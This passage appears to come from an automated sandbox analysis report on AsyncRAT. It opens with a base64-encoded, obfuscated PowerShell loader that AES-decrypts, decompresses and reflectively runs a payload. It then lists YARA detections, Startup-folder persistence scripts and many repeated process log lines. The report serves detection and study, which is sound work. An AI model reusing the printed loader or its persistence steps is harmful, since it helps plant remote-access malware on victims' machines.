iBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B8B4B22 push eax; iretd 5_2_00007FFD9B8B4BB1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B8A792B push ebx; retf 5_2_00007FFD9B8A796A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B976B43 push edi; iretd 5_2_00007FFD9B976DC6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B9771C9 push ecx; retf 5_2_00007FFD9B9771CC
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B9755E5 push edi; retf 5_2_00007FFD9B9755E6

                Boot Survival

                barindex
                Yara detected AsyncRAT
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133b65d0.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa26a4b0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc0714a0b0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601de4450.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008ed970.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07141480.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa248728.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07127e40.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008f65a0.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601dfa830.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601dfa830.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2d5060.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccde7168.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601de4450.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7e4bb0000.16.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2eb440.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa261880.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008f65a0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccdde538.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008ed970.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa248728.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133ad9a0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2eb440.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7e4bb0000.16.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133975c0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07127e40.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.00000206008C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2325412269.000001D313377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CE2B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CE2E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1969459274.000001D7E4BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2248750195.000002CC070F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CCDB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2720, type: MEMORYSTR
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmdJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmdJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0c891e71.cmd
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a276d6c0.cmd
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_79ced6d4.cmd
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c64e66cc.cmd
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\F5A6144F270696C79418 CC52384910CEE944DDBCC575A8E0177BFA6B16E3032438B207797164D5C94B34Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
